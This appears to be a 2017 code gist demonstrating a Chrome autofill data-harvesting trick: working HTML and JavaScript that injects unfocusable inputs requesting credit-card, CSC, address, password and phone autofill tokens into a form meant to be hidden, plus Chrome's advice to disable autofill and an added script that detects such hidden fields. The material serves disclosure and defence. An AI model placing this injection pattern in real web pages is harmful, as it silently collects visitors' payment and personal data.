Created
January 14, 2017 09:06
Chrome Autofill Exploit Example
```html
<!DOCTYPE html>
<html>
<head>
  <meta charset="utf-8">
  <title>Test Chrome Autofill Hack</title>
  <style media="screen">
    .hidden {
      /* Left commented out for the demo so the injected fields stay visible */
      /*display: none;*/
    }
  </style>
</head>
<body>
  <form action="/my-handling-form-page" method="post" id="form">
    <div>
      <label for="name">Name:</label>
      <input type="text" id="name" name="user_name" />
    </div>
    <div>
      <label for="email">E-mail:</label>
      <input type="email" id="email" name="user_mail" />
    </div>
    <div>
      <label for="msg">Message:</label>
      <textarea id="msg" name="user_message"></textarea>
    </div>
    <div class="button">
      <button type="submit">Submit</button>
    </div>
  </form>
  <script type="text/javascript">
    // Autofill field names to request, one injected input per name
    var autocompletes = ['name', 'honorific-prefix', 'given-name',
      'additional-name', 'family-name', 'honorific-suffix',
      'nickname', 'username', 'new-password',
      'current-password', 'organization-title', 'organization',
      'street-address', 'address-line1', 'address-line2',
      'address-line3', 'address-level4', 'address-level3',
      'address-level2', 'address-level1', 'country',
      'country-name', 'postal-code', 'cc-name', 'cc-given-name',
      'cc-additional-name', 'cc-family-name', 'cc-exp',
      'cc-exp-month', 'cc-exp-year', 'cc-csc', 'cc-type',
      'transaction-currency', 'transaction-amount',
      'language', 'bday', 'bday-day', 'bday-month',
      'bday-year', 'sex', 'url', 'photo', 'tel',
      'tel-country-code', 'tel-national',
      'tel-area-code', 'tel-local', 'tel-local-prefix',
      'tel-local-suffix', 'tel-extension', 'impp'
    ];
    var emailField = document.getElementById('email');
    var form = document.getElementById('form');
    emailField.addEventListener('focus', function injectOnce() {
      var wrap = autocompletes.reduce(function(wrapper, field) {
        var input = document.createElement('input');
        // Make them not focusable
        input.tabIndex = -1;
        input.autocomplete = field;
        wrapper.appendChild(input);
        return wrapper;
      }, document.createElement('div'));
      // Hide the wrapper
      wrap.classList.add('hidden');
      form.appendChild(wrap);
      // Inject the autocompletes once
      this.removeEventListener('focus', injectOnce);
    });
  </script>
</body>
</html>
```
Chrome's solution - disable autofill
Turn off Autofill
1. Open Chrome.
2. At the top right, click More Settings.
3. At the bottom, click Show advanced settings.
4. Under "Passwords and forms," uncheck "Enable Autofill to fill out web forms in a single click."
In this example I left the `.hidden` class visible so you could easily see what the form does when you allow autofill. However, if this were a real exploit, the user would never see the hidden fields auto-populate, and when the form was submitted (via AJAX, for example) it would include any fields that Chrome autofill data had stored.
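A defender's check for the pattern the gist and the comment above describe, written as an added example that is not part of the gist or its author's comment: it lists inputs that carry an autofill token but are not rendered or not focusable. The descriptor shape, `auditFields`, `describeInputs`, the sensitive-token policy and the sample data are assumptions made for this example.

```javascript
// Added example (not from the gist): flag autofill-enabled inputs the user cannot see or reach.
// Descriptors are plain objects so the check runs in Node; describeInputs() builds them in a browser.

// Tokens a name/e-mail/message form has no reason to request (constructed policy, tune per form).
const SENSITIVE_PREFIXES = ['cc-', 'address-', 'street-address', 'postal-code', 'tel',
  'bday', 'current-password', 'new-password'];

function auditFields(fields) {
  const findings = [];
  for (const f of fields) {
    // autocomplete may hold several tokens, e.g. "section-x billing cc-number"
    const tokens = (f.autocomplete || '').toLowerCase().split(/\s+/).filter(Boolean);
    if (tokens.length === 0 || tokens.includes('off')) continue;
    const reasons = [];
    if (!f.rendered) reasons.push('not rendered');
    if (f.tabIndex < 0) reasons.push('not focusable');
    if (f.rendered && (f.width < 2 || f.height < 2)) reasons.push('near-zero size');
    if (reasons.length === 0) continue;
    const sensitive = tokens.some((t) => SENSITIVE_PREFIXES.some((p) => t.startsWith(p)));
    findings.push({ name: f.name, tokens, reasons, sensitive });
  }
  return findings;
}

// Browser-only: build descriptors from a live form (standard DOM APIs; not called in Node).
function describeInputs(form) {
  return Array.from(form.querySelectorAll('input, select, textarea')).map((el) => {
    const box = el.getBoundingClientRect();
    return {
      name: el.name || el.id || '(unnamed)',
      autocomplete: el.getAttribute('autocomplete'),
      tabIndex: el.tabIndex,
      // getClientRects() is empty when the element or an ancestor is display:none
      rendered: el.getClientRects().length > 0 && getComputedStyle(el).visibility !== 'hidden',
      width: box.width, height: box.height,
    };
  });
}

// Constructed sample modelled on the gist: three visible fields plus three injected inputs.
const SAMPLE_FIELDS = [
  { name: 'user_name', autocomplete: null, tabIndex: 0, rendered: true, width: 180, height: 22 },
  { name: 'user_mail', autocomplete: 'email', tabIndex: 0, rendered: true, width: 180, height: 22 },
  { name: 'user_message', autocomplete: null, tabIndex: 0, rendered: true, width: 180, height: 40 },
  { name: '(unnamed)', autocomplete: 'cc-csc', tabIndex: -1, rendered: false, width: 0, height: 0 },
  { name: '(unnamed)', autocomplete: 'street-address', tabIndex: -1, rendered: true, width: 150, height: 20 },
  { name: '(unnamed)', autocomplete: 'shipping tel-national', tabIndex: -1, rendered: false, width: 0, height: 0 },
];
console.log(auditFields(SAMPLE_FIELDS));
```

In a browser, pass `describeInputs(form)` after interacting with the form, since the gist injects its inputs only when the e-mail field receives focus.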